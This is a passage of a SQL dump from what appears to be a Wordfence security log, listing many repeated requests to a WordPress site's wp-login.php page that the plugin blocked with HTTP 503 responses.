Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7692,1564576076.020011,1564576075.660800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7693,1564576075.302042,1564576074.930100,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7694,1564576074.566288,1564576074.189600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7695,1564576073.770270,1564576073.327700,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7696,1564576067.781847,1564576067.318200,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7697,1564576061.892310,1564576061.471500,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7698,1564576050.886430,1564576049.336300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7699,1564576048.470055,1564576047.572900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7700,1564576045.774205,1564576044.797800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7701,1564576044.018996,1564576043.274200,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7702,1564576042.391849,1564576041.949700,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7703,1564576041.044239,1564576040.221300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7704,1564576027.036640,1564576026.653400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7705,1564576026.282025,1564576025.879700,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7706,1564576025.033553,1564576024.700400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7707,1564576024.277533,1564576023.958400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7708,1564576023.509128,1564576023.203200,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7709,1564576017.854076,1564576017.513300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7710,1564576012.080934,1564576011.702600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7711,1564576006.342739,1564576006.019400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7712,1564576005.651380,1564576005.327200,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7713,1564576004.825297,1564576004.460800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7714,1564576004.126641,1564576003.703000,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7715,1564576002.773689,1564576002.252300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7716,1564575996.763972,1564575996.224500,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7717,1564575990.749649,1564575990.176900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7718,1564575984.641792,1564575984.015400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7719,1564575983.016200,1564575982.471300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7720,1564575981.902785,1564575981.391300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7721,1564575980.844599,1564575980.324900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7722,1564575979.867567,1564575979.223800,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7723,1564575978.782121,1564575978.340400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7724,1564575977.053634,1564575976.543000,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7725,1564575970.110283,1564575969.546300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7726,1564575968.504723,1564575967.749000,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7727,1564575966.747205,1564575966.266600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7728,1564575965.274943,1564575964.275900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7729,1564575958.876821,1564575958.402100,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7730,1564575952.979594,1564575952.520300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7731,1564575947.023462,1564575946.538600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7732,1564575941.070629,1564575940.471400,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7733,1564575935.041389,1564575934.546600,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7734,1564575933.607973,1564575932.917700,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7735,1564575932.389199,1564575931.541900,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7736,1564575925.881298,1564575925.313300,'\0\0\0\0\0\0\0\0\0\0ũ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7737,0.000000,1564584253.583479,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7738,1564584322.491366,1564584321.453600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7739,1564584320.231031,1564584319.049300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7740,1564584317.890268,1564584316.659200,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7741,1564584315.570847,1564584314.759200,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7742,1564584313.803717,1564584312.489000,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7743,1564584309.741768,1564584308.481900,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7744,1564584306.067813,1564584304.352000,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7745,1564584303.278083,1564584302.751200,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7746,1564584302.037405,1564584301.475400,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7747,1564584300.738017,1564584300.256500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7748,1564584299.396458,1564584298.727300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7749,1564584297.949363,1564584297.501100,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7750,1564584296.803357,1564584296.342500,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7751,1564584295.596140,1564584295.102300,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7752,1564584294.369161,1564584293.856600,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7753,1564584293.170180,1564584292.697100,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7754,1564584291.710601,1564584291.244400,'\0\0\0\0\0\0\0\0\0\0Dٹ',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; 